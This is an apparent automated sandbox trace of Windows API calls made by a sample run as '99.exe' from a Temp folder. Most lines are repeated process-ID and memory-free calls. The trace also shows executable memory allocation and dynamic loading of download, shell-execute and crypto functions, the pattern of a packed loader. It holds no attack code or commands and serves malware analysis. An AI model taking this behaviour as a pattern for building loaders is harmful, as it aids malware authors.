0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.797] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.797] GetCurrentProcessId () returned 0xb7c [0280.797] GetCurrentProcessId () returned 0xb7c [0280.797] GetCurrentProcessId () returned 0xb7c [0280.797] GetCurrentProcessId () returned 0xb7c [0280.797] GetCurrentProcessId () returned 0xb7c [0280.797] GetCurrentProcessId () returned 0xb7c [0280.797] GetCurrentProcessId () returned 0xb7c [0280.797] GetCurrentProcessId () returned 0xb7c [0280.797] GetCurrentProcessId () returned 0xb7c [0280.797] GetCurrentProcessId () returned 0xb7c [0280.798] GetCurrentProcessId () returned 0xb7c [0280.798] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.798] GetCurrentProcessId () returned 0xb7c [0280.798] GetCurrentProcessId () returned 0xb7c [0280.798] GetCurrentProcessId () returned 0xb7c [0280.798] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.799] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.800] GetCurrentProcessId () returned 0xb7c [0280.801] GetCurrentProcessId () returned 0xb7c [0280.801] GetCurrentProcessId () returned 0xb7c [0280.801] GetCurrentProcessId () returned 0xb7c [0280.801] GetCurrentProcessId () returned 0xb7c [0280.801] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.802] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.803] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.804] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.804] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.805] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.806] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.807] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.808] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.809] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.810] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.811] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.812] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.813] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.814] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.815] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.816] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.816] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.817] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.818] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.819] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.820] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.821] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.949] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.950] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.951] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.952] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.952] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.953] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.954] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.962] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.964] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.965] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.966] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.967] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.968] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.969] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0281.346] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0281.347] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0281.348] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0281.349] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0281.349] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0281.350] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0281.351] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.606] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0282.607] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0282.607] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0282.607] GetProcAddress (hModule=0x773b0000, lpProcName="SetForegroundWindow") returned 0x773ef170 [0282.608] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77240000 [0282.608] GetProcAddress (hModule=0x77240000, lpProcName="CreateCompatibleBitmap") returned 0x77255f49 [0282.608] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76c20000 [0282.609] GetProcAddress (hModule=0x76c20000, lpProcName="CryptAcquireContextA") returned 0x76c291dd [0282.609] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75cb0000 [0282.610] GetProcAddress (hModule=0x75cb0000, lpProcName="ShellExecuteW") returned 0x75cc3c71 [0282.610] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x771d0000 [0282.611] GetProcAddress (hModule=0x771d0000, lpProcName="PathFileExistsW") returned 0x771e45bf [0282.611] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x6bed0000 [0282.611] GetProcAddress (hModule=0x6bed0000, lpProcName="PlaySoundW") returned 0x6bed2ef2 [0282.611] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75610000 [0282.612] GetProcAddress (hModule=0x75610000, lpProcName=0x13) returned 0x75616f01 [0282.612] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x75a80000 [0282.613] GetProcAddress (hModule=0x75a80000, lpProcName="URLDownloadToFileW") returned 0x75b166f6 [0282.613] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x6c5c0000 [0282.613] GetProcAddress (hModule=0x6c5c0000, lpProcName="GdiplusStartup") returned 0x6c5e5600 [0282.615] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.616] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.618] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.619] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.620] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.621] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.623] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.624] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.625] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.627] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.628] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.629] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.631] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.632] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.633] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.634] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.635] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.636] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.637] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.639] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.640] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.641] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.642] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.643] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.644] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.645] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.646] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0282.647] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.382] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.383] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.384] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.386] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.387] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.388] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.389] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.397] GetSystemTime (in: lpSystemTime=0x18fef4 | out: lpSystemTime=0x18fef4*(wYear=0x7e5, wMonth=0xc, wDayOfWeek=0x1, wDay=0x1b, wHour=0x16, wMinute=0xc, wSecond=0x10, wMilliseconds=0x9a)) [0283.398] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.399] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.401] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.402] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.403] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.405] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.406] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.657] ExpandEnvironmentStringsA (in: lpSrc="aspr_keys.ini", lpDst=0x18f6a8, nSize=0x400 | out: lpDst="aspr_keys.ini") returned 0xe [0283.670] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9a8, nSize=0xff | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0283.676] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0x282128, ftCreationTime.dwLowDateTime=0x18fab0, ftCreationTime.dwHighDateTime=0x28214c, ftLastAccessTime.dwLowDateTime=0x282153, ftLastAccessTime.dwHighDateTime=0x2b, ftLastWriteTime.dwLowDateTime=0x18f9a8, ftLastWriteTime.dwHighDateTime=0x18fac8, nFileSizeHigh=0xc90000, nFileSizeLow=0x34c580, dwReserved0=0x18fed8, dwReserved1=0x2825a2, cFileName="\x88Å4", cAlternateFileName="ÀÅ4")) returned 0xffffffff [0283.792] GetTempPathA (in: nBufferLength=0x3ff, lpBuffer=0x18fad0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0283.792] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0xc90000, ftCreationTime.dwLowDateTime=0x2000, ftCreationTime.dwHighDateTime=0xcb4978, ftLastAccessTime.dwLowDateTime=0x18fa50, ftLastAccessTime.dwHighDateTime=0x77a1389e, ftLastWriteTime.dwLowDateTime=0xc90138, ftLastWriteTime.dwHighDateTime=0x77a1387a, nFileSizeHigh=0x7660c072, nFileSizeLow=0x0, dwReserved0=0xc90000, dwReserved1=0xcb4980, cFileName="L\x01", cAlternateFileName="\x8cú\x18")) returned 0xffffffff [0283.792] GetCurrentProcessId () returned 0xb7c [0283.792] GetCurrentProcessId () returned 0xb7c [0283.798] GetCurrentProcessId () returned 0xb7c [0283.798] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.799] GetCurrentProcessId () returned 0xb7c [0283.806] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0283.814] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.815] GetCurrentProcessId () returned 0xb7c [0283.815] GetCurrentProcessId () returned 0xb7c [0283.815] GetCurrentProcessId () returned 0xb7c [0283.815] GetCurrentProcessId () returned 0xb7c [0283.815] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0283.817] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.818] GetCurrentProcessId () returned 0xb7c [0283.818] GetCurrentProcessId () returned 0xb7c [0283.818] GetCurrentProcessId () returned 0xb7c [0283.818] GetCurrentProcessId () returned 0xb7c [0283.818] GetCurrentProcessId () returned 0xb7c [0283.818] GetCurrentProcessId () returned 0xb7c [0283.818] GetCurrentProcessId () returned 0xb7c [0283.818] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] GetCurrentProcessId () returned 0xb7c [0283.819] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0283.821] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.822] GetCurrentProcessId () returned 0xb7c [0283.822] GetCurrentProcessId () returned 0xb7c [0283.822] GetCurrentProcessId () returned 0xb7c [0283.822] GetCurrentProcessId () returned 0xb7c [0283.822] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0283.823] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.825] GetCurrentProcessId () returned 0xb7c [0283.825] GetCurrentProcessId () returned 0xb7c [0283.825] GetCurrentProcessId () returned 0xb7c [0283.825] GetCurrentProcessId () returned 0xb7c [0283.825] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0283.826] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.827] GetCurrentProcessId () returned 0xb7c [0283.827] GetCurrentProcessId () returned 0xb7c [0283.827] GetCurrentProcessId () returned 0xb7c [0283.827] GetCurrentProcessId () returned 0xb7c [0283.827] GetCurrentProcessId () returned 0xb7c [0283.827] GetCurrentProcessId () returned 0xb7c [0283.827] GetCurrentProcessId () returned 0xb7c [0283.827] GetCurrentProcessId () returned 0xb7c [0283.827] GetCurrentProcessId () returned 0xb7c [0283.828] GetCurrentProcessId () returned 0xb7c [0283.828] GetCurrentProcessId () returned 0xb7c [0283.828] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.829] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.830] VirtualFree (lpAddress=0x2660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.831] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.832] VirtualFree (lpAddress=0x27c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.701] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] GetCurrentProcessId () returned 0xb7c [0284.702] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.705] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.706] GetCurrentProcessId () returned 0xb7c [0284.706] GetCurrentProcessId () returned 0xb7c [0284.706] GetCurrentProcessId () returned 0xb7c [0284.706] GetCurrentProcessId () returned 0xb7c [0284.706] GetCurrentProcessId () returned 0xb7c [0284.707] GetCurrentProcessId () returned 0xb7c [0284.707] GetCurrentProcessId () returned 0xb7c [0284.707] GetCurrentProcessId () returned 0xb7c [0284.707] GetCurrentProcessId () returned 0xb7c [0284.707] GetCurrentProcessId () returned 0xb7c [0284.707] GetCurrentProcessId () returned 0xb7c [0284.707] GetCurrentProcessId () returned 0xb7c [0284.707] GetCurrentProcessId () returned 0xb7c [0284.707] GetCurrentProcessId () returned 0xb7c [0284.707] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.708] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] GetCurrentProcessId () returned 0xb7c [0284.709] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.710] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.711] GetCurrentProcessId () returned 0xb7c [0284.712] GetCurrentProcessId () returned 0xb7c [0284.712] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.712] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] GetCurrentProcessId () returned 0xb7c [0284.714] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.715] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.716] GetCurrentProcessId () returned 0xb7c 